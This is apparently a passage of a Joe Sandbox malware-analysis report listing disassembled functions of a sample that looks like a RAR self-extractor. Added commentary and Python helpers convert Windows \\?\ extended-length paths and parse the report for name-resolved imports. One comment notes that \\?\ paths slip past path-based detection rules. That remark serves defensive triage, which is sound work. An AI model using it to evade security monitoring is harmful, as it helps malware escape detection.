                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: b43b4adc3bb195d1644a7f909b7f01825da6608f8df44a7fc2132e77a0d322ae
                                                                                              • Instruction ID: fe4c4f1ee539a125a9df19eae9e38f9e57032920fe719c4b2164b407a3e6064f
                                                                                              • Opcode Fuzzy Hash: b43b4adc3bb195d1644a7f909b7f01825da6608f8df44a7fc2132e77a0d322ae
                                                                                              • Instruction Fuzzy Hash: 81F0283D1C0A00A7D201B3746F0AF2B1A759BE1771F350118FA1D931D2FE758D425523
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A31907: _wcslen.LIBCMT ref: 00A3190D
                                                                                                • Part of subcall function 00A2CD5C: _wcsrchr.LIBVCRUNTIME ref: 00A2CD73
                                                                                              • _wcslen.LIBCMT ref: 00A2D5A4
                                                                                              • _wcslen.LIBCMT ref: 00A2D5EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcsrchr
                                                                                              • String ID: .exe$.rar$.sfx
                                                                                              • API String ID: 3513545583-31770016
                                                                                              • Opcode ID: aceda0cb4e675f6a6e50b88cfb90cf7217e15f75178d10ec5031c6e4e6ac9dd7
                                                                                              • Instruction ID: 284c20c189cb30f52795f7cf99c258063d6f0074b3d64330de64e1fca2c4990d
                                                                                              • Opcode Fuzzy Hash: aceda0cb4e675f6a6e50b88cfb90cf7217e15f75178d10ec5031c6e4e6ac9dd7
                                                                                              • Instruction Fuzzy Hash: 1D4137229043709AC731AF78A842A7B73B8FF55759F14492EF8865B182E7A08D81C391
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00A2CF56
                                                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00A2B505,?,?,00000800,?,?,00A2B4CA,?), ref: 00A2CFF4
                                                                                              • _wcslen.LIBCMT ref: 00A2D06A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CurrentDirectory
                                                                                              • String ID: UNC$\\?\
                                                                                              • API String ID: 3341907918-253988292
                                                                                              • Opcode ID: cbe272e0bebd193a9c1d14f3448d0028de2b799459b0b68da84b7bcf6a6675ed
                                                                                              • Instruction ID: a978e5186bbbf5d43e6a8d1506af91328aaa56d61b614b358d9dcc9008821cb6
                                                                                              • Opcode Fuzzy Hash: cbe272e0bebd193a9c1d14f3448d0028de2b799459b0b68da84b7bcf6a6675ed
                                                                                              • Instruction Fuzzy Hash: 4B41E531408229BACF21AF68ED01EEE777ABF49351F104435FC96A3066D774D996CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
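
The `UNC` and `\\?\` strings beside GetCurrentDirectoryW in the entry above are the fingerprint of extended-length path handling: a relative path is made absolute against the current directory and given the `\\?\` prefix, and a `\\server\share` path becomes `\\?\UNC\server\share`. This matters when triaging dropped-file paths, because `\\?\`-prefixed paths reach the kernel without Win32 normalisation (no MAX_PATH limit, no `..` or `/` rewriting), so a detection rule or allow-list written against `C:\Users\...` does not match `\\?\C:\Users\...`. The Python below is an added illustration of that conversion and of its inverse for log normalisation; it is not code from the sample or from Joe Sandbox. That the function at 00A2CF56 implements exactly these rules is inferred from its strings and calls, and the current directory is passed in as a parameter (a stand-in for GetCurrentDirectoryW) so the example runs anywhere.

```python
r"""Extended-length (\\?\) path prefixing and its inverse.

Added example; not the sample's code. `cwd` stands in for GetCurrentDirectoryW
so the functions are deterministic and run on any platform. The rule set is the
documented Win32 behaviour, assumed (from the strings seen) to be what the
analysed function does.
"""
import ntpath

LONG_PREFIX = "\\\\?\\"           # \\?\
UNC_LONG_PREFIX = "\\\\?\\UNC\\"  # \\?\UNC\
DEVICE_PREFIXES = ("\\\\?\\", "\\\\.\\")


def to_extended_path(path: str, cwd: str) -> str:
    r"""Return `path` as an absolute, normalised \\?\ path.

    Check order mirrors the Win32 path classes: device path, UNC, drive-absolute,
    rooted on the current drive, relative to the current directory.
    """
    if path.startswith(DEVICE_PREFIXES):
        return path                                   # already a device path; left untouched
    path = path.replace("/", "\\")
    if path.startswith("\\\\"):                       # \\server\share\...
        full = ntpath.normpath(path)
    elif len(path) >= 3 and path[1] == ":" and path[2] == "\\":   # C:\...
        full = ntpath.normpath(path)
    elif path.startswith("\\"):                       # \dir\file, rooted on cwd's drive
        drive = ntpath.splitdrive(cwd)[0]
        full = ntpath.normpath(drive + path)
    else:                                             # relative to cwd
        full = ntpath.normpath(ntpath.join(cwd, path))
    # Win32 skips normalisation for \\?\ paths, so '..' and '/' had to be resolved above.
    if full.startswith("\\\\"):
        return UNC_LONG_PREFIX + full[2:]
    return LONG_PREFIX + full


def strip_extended_prefix(path: str) -> str:
    r"""Inverse mapping for alert/log normalisation: \\?\UNC\s\x -> \\s\x, \\?\C:\x -> C:\x."""
    if path.startswith(UNC_LONG_PREFIX):
        return "\\\\" + path[len(UNC_LONG_PREFIX):]
    if path.startswith(LONG_PREFIX):
        return path[len(LONG_PREFIX):]
    return path


if __name__ == "__main__":
    cwd = "C:\\Users\\user\\Desktop"                 # constructed stand-in for GetCurrentDirectoryW
    for p in ("sub\\..\\payload.exe", "\\\\srv\\share\\dir\\..\\f.rar", "C:/Windows/System32/cmd.exe"):
        ext = to_extended_path(p, cwd)
        print(f"{p!r:45} -> {ext!r:50} -> {strip_extended_prefix(ext)!r}")
```

When writing path-based detections or comparing dropped-file paths from a report against an allow-list, run both sides through `strip_extended_prefix` first (or match on `to_extended_path` output); otherwise the `\\?\` form slips past a pattern that only knows `C:\`.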

                                                                                              APIs
                                                                                              • LoadBitmapW.USER32(00000065), ref: 00A3C8DD
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00A3C902
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A3C934
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A3C957
                                                                                                • Part of subcall function 00A3B6D2: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00A3C92D,00000066), ref: 00A3B6E5
                                                                                                • Part of subcall function 00A3B6D2: SizeofResource.KERNEL32(00000000,?,?,?,00A3C92D,00000066), ref: 00A3B6FC
                                                                                                • Part of subcall function 00A3B6D2: LoadResource.KERNEL32(00000000,?,?,?,00A3C92D,00000066), ref: 00A3B713
                                                                                                • Part of subcall function 00A3B6D2: LockResource.KERNEL32(00000000,?,?,?,00A3C92D,00000066), ref: 00A3B722
                                                                                                • Part of subcall function 00A3B6D2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00A3C92D,00000066), ref: 00A3B73D
                                                                                                • Part of subcall function 00A3B6D2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00A3C92D,00000066), ref: 00A3B74E
                                                                                                • Part of subcall function 00A3B6D2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A3B7B7
                                                                                                • Part of subcall function 00A3B6D2: GlobalUnlock.KERNEL32(00000000), ref: 00A3B7D6
                                                                                                • Part of subcall function 00A3B6D2: GlobalFree.KERNEL32(00000000), ref: 00A3B7DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                                              • String ID: ]
                                                                                              • API String ID: 1428510222-3352871620
                                                                                              • Opcode ID: 5df8048082d6ff89ae8cb86ac0c838a684fe8670a9d52a594f4fb13c12810d4c
                                                                                              • Instruction ID: 579acaaaa5960b0b34a43531b6dbce47f575b4d1d009bbff2f3fd0fd1160d228
                                                                                              • Opcode Fuzzy Hash: 5df8048082d6ff89ae8cb86ac0c838a684fe8670a9d52a594f4fb13c12810d4c
                                                                                              • Instruction Fuzzy Hash: 0C01D2329007156BCB1177B49D0AB7F7ABAAF81B61F160124FE01B7292DF718C0697B0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A212F6: GetDlgItem.USER32(00000000,00003021), ref: 00A2133A
                                                                                                • Part of subcall function 00A212F6: SetWindowTextW.USER32(00000000,00A545F4), ref: 00A21350
                                                                                              • EndDialog.USER32(?,00000001), ref: 00A3E79B
                                                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00A3E7B1
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A3E7C5
                                                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 00A3E7D4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: RENAMEDLG
                                                                                              • API String ID: 445417207-3299779563
                                                                                              • Opcode ID: 90cfc665eb097c3ae47e21d0258627a14d8cc2b5ee38c7fd2c6b78b2dce9f2e1
                                                                                              • Instruction ID: 12210973696880fc35718fa99c8e50b5e395cf0d521781547b839a4e8ac8ea93
                                                                                              • Opcode Fuzzy Hash: 90cfc665eb097c3ae47e21d0258627a14d8cc2b5ee38c7fd2c6b78b2dce9f2e1
                                                                                              • Instruction Fuzzy Hash: 8701F732681310BFE211DFB89D4DFA77BADFF59B02F100511F701E60D0C6A269068B65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A491E6,00000000,?,00A49186,00000000,00A5D570,0000000C,00A492DD,00000000,00000002), ref: 00A49255
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A49268
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00A491E6,00000000,?,00A49186,00000000,00A5D570,0000000C,00A492DD,00000000,00000002), ref: 00A4928B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 4973e5fc61569997091a86e2a2e4754a7c6483bcbb476374176f63b2766d9022
                                                                                              • Instruction ID: 58370398abb1b603a7841678053a0e5ad310f14a64cad1dd3b71b4207db16380
                                                                                              • Opcode Fuzzy Hash: 4973e5fc61569997091a86e2a2e4754a7c6483bcbb476374176f63b2766d9022
                                                                                              • Instruction Fuzzy Hash: A6F04F74A00218BBDB11DBA4EC09BDFBFB4FB48756F000168F905B21A0DB745E95CA91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A31B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A31B56
                                                                                                • Part of subcall function 00A31B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3063A,Crypt32.dll,00000000,00A306B4,00000200,?,00A30697,00000000,00000000,?), ref: 00A31B78
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A30646
                                                                                              • GetProcAddress.KERNEL32(00A6A1F0,CryptUnprotectMemory), ref: 00A30656
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                              • API String ID: 2141747552-1753850145
                                                                                              • Opcode ID: 16db74330875fa830478c072669fe87488867b81cb0ffead4c9f5379117c0cc8
                                                                                              • Instruction ID: 2132cda774763d114f519a32df476f21d553dd62273b6c61158381712739199b
                                                                                              • Opcode Fuzzy Hash: 16db74330875fa830478c072669fe87488867b81cb0ffead4c9f5379117c0cc8
                                                                                              • Instruction Fuzzy Hash: D9E04FB08047116ED7605F74A959F02BEE4BB1870AF118C1DF68693195D6B4D8C58B10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
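The two entries above are the ones in this section worth a second look: the mscoree.dll entry resolves CorExitProcess with GetModuleHandleExW and GetProcAddress, which matches the MSVC CRT's own exit routine, while the Crypt32.dll entry builds a path with GetSystemDirectoryW, loads Crypt32.dll from it and resolves CryptProtectMemory and CryptUnprotectMemory by name. Joe Sandbox summarises each entry with an "API ID" and a "String ID". The Python script below is an added example, not code from the Joe Sandbox report or its tooling: it parses the "APIs" bullets of an entry (the mscoree.dll, Crypt32.dll and CloseHandle entries from this page are embedded as sample input), lists the DLLs named in the arguments and the exports resolved through GetProcAddress, and rebuilds the API ID. The rebuild rule (CamelCase words shorter than four characters dropped, the remaining words grouped by how often they occur, each group sorted and the groups joined with "$" in descending-frequency order) is an assumption inferred from the entries on this page, not Joe Sandbox's documented algorithm; it reproduces every API ID shown in this section but may differ on entries not shown. The String ID is not rebuilt because it also draws on strings the report lists outside the API arguments (RENAMEDLG in the dialog entry, for instance).

```python
"""Summarise the "APIs" bullets of Joe Sandbox function entries.

Added example, not Joe Sandbox code. The API ID rule in api_id() is an
assumption inferred from the entries on this page.
"""
import re
from collections import Counter
from typing import Dict, List, NamedTuple, Tuple


class ApiCall(NamedTuple):
    api: str          # "GetProcAddress"
    module: str       # "KERNEL32"
    args: List[str]   # argument tokens exactly as printed in the report
    ref: str          # call-site address
    subcall: bool     # True for "Part of subcall function ..." lines


# One "APIs" bullet, for example:
#   • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A30646
#   • Part of subcall function 00A31B3B: LoadLibraryW.KERNELBASE(?,...), ref: 00A31B78
#   • _free.LIBCMT ref: 00A4D155
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")          # address or numeric argument
WORD = re.compile(r"[A-Z][a-z0-9]*|_[a-z0-9_]+")   # CamelCase words; "_free" stays whole

# Sample input: the "APIs" bullets of three entries copied from this report page.
CRYPT32_ENTRY = """
  • Part of subcall function 00A31B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A31B56
  • Part of subcall function 00A31B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3063A,Crypt32.dll,00000000,00A306B4,00000200,?,00A30697,00000000,00000000,?), ref: 00A31B78
• GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A30646
• GetProcAddress.KERNEL32(00A6A1F0,CryptUnprotectMemory), ref: 00A30656
"""
MSCOREE_ENTRY = """
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A491E6,00000000,?,00A49186,00000000,00A5D570,0000000C,00A492DD,00000000,00000002), ref: 00A49255
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A49268
• FreeLibrary.KERNEL32(00000000,?,?,?,00A491E6,00000000,?,00A49186,00000000,00A5D570,0000000C,00A492DD,00000000,00000002), ref: 00A4928B
"""
SYNC_ENTRY = """
  • Part of subcall function 00A324EF: ResetEvent.KERNEL32(?), ref: 00A32501
  • Part of subcall function 00A324EF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00A32515
• ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00A32241
• CloseHandle.KERNEL32(?,?), ref: 00A3225B
• DeleteCriticalSection.KERNEL32(?), ref: 00A32274
• CloseHandle.KERNEL32(?), ref: 00A32280
• CloseHandle.KERNEL32(?), ref: 00A3228C
  • Part of subcall function 00A32303: WaitForSingleObject.KERNEL32(?,000000FF,00A32526,?), ref: 00A32309
  • Part of subcall function 00A32303: GetLastError.KERNEL32(?), ref: 00A32315
"""


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return every API bullet in `text` as an ApiCall; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"] is not None))
    return calls


def api_id(calls: List[ApiCall]) -> str:
    """Rebuild the entry's "API ID" under the assumed rule: words shorter than
    four characters dropped, words grouped by frequency, each group sorted,
    groups joined with '$' from most to least frequent."""
    words = Counter(w for c in calls for w in WORD.findall(c.api) if len(w) >= 4)
    by_count: Dict[int, List[str]] = {}
    for w, n in words.items():
        by_count.setdefault(n, []).append(w)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def string_args(calls: List[ApiCall]) -> List[str]:
    """Arguments that are neither 8-digit hex values nor '?': DLL and export names."""
    return sorted({a for c in calls for a in c.args if a and a != "?" and not HEX_ARG.match(a)})


def dynamic_imports(calls: List[ApiCall]) -> Dict[str, list]:
    """DLLs named in the arguments and exports resolved by name through GetProcAddress."""
    modules = sorted({a for c in calls for a in c.args if a.lower().endswith(".dll")})
    exports: List[Tuple[str, str]] = [
        (c.args[1], c.ref) for c in calls
        if c.api == "GetProcAddress" and len(c.args) > 1 and not HEX_ARG.match(c.args[1])
    ]
    return {"modules": modules, "exports": exports}


if __name__ == "__main__":
    for name, entry in (("Crypt32", CRYPT32_ENTRY), ("mscoree", MSCOREE_ENTRY), ("sync", SYNC_ENTRY)):
        calls = parse_api_lines(entry)
        print(name, api_id(calls), dynamic_imports(calls))
```

Run as a script it prints, per entry, the rebuilt API ID and the name-resolved imports. The point of the `dynamic_imports` output is triage: imports resolved by name at run time never appear in the PE import table, so a list pulled from the report entries is the quickest way to separate behaviour worth chasing (the Crypt32 pair here) from CRT boilerplate such as the CorExitProcess lookup.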

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2252061734-0
                                                                                              • Opcode ID: 6a14c2c7c13516d635594378bf9a26ff6e79ba068be413b60cb1f246ac0e1c36
                                                                                              • Instruction ID: e7433558db79c2552b6c7a083bb05fe11a91871a56a86d33eda22d18ce057be5
                                                                                              • Opcode Fuzzy Hash: 6a14c2c7c13516d635594378bf9a26ff6e79ba068be413b60cb1f246ac0e1c36
                                                                                              • Instruction Fuzzy Hash: 5651AD7BA02206AFEF299F15D942B6A77B4FFC4310F14492DE90257291E771EE80CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00A4D0F9
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A4D11C
                                                                                                • Part of subcall function 00A4A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A4DBEC,00000000,?,00A480B1,?,00000008,?,00A4A871,?,?,?), ref: 00A4A830
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A4D142
                                                                                              • _free.LIBCMT ref: 00A4D155
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A4D164
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: d28477dc154e11ba54eeaa57bd69d17a1ce09efac65f93865bab1d0d4e01f94c
                                                                                              • Instruction ID: b6fca4319fcea084069749ae3673aaeec90cb3d239ee6996f31b997e95ec625e
                                                                                              • Opcode Fuzzy Hash: d28477dc154e11ba54eeaa57bd69d17a1ce09efac65f93865bab1d0d4e01f94c
                                                                                              • Instruction Fuzzy Hash: 7F018F7A6017257F27215BBA6C88C7B6A7DFEC6BA53150329FD08C7201EA648C42C1B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,00A4A7F0,00A4C348,?,00A4A543,00000001,00000364,?,00A45281,00000050,?,00A63070,00000200), ref: 00A4A59E
                                                                                              • _free.LIBCMT ref: 00A4A5D3
                                                                                              • _free.LIBCMT ref: 00A4A5FA
                                                                                              • SetLastError.KERNEL32(00000000,?,00A63070,00000200), ref: 00A4A607
                                                                                              • SetLastError.KERNEL32(00000000,?,00A63070,00000200), ref: 00A4A610
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 26f54b0e60ca0a035b6f94f50b2c330d8484e32d32f5a5784ed99c5846621dd3
                                                                                              • Instruction ID: bc587dbd98191d59fc25b57b070a6b77162c42efef0c25c86a92040c3451bb84
                                                                                              • Opcode Fuzzy Hash: 26f54b0e60ca0a035b6f94f50b2c330d8484e32d32f5a5784ed99c5846621dd3
                                                                                              • Instruction Fuzzy Hash: 5F01F93E2C5600A7C212A7B46F45D1B257AEBF577132A0018F90D92181FF748D426167
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A324EF: ResetEvent.KERNEL32(?), ref: 00A32501
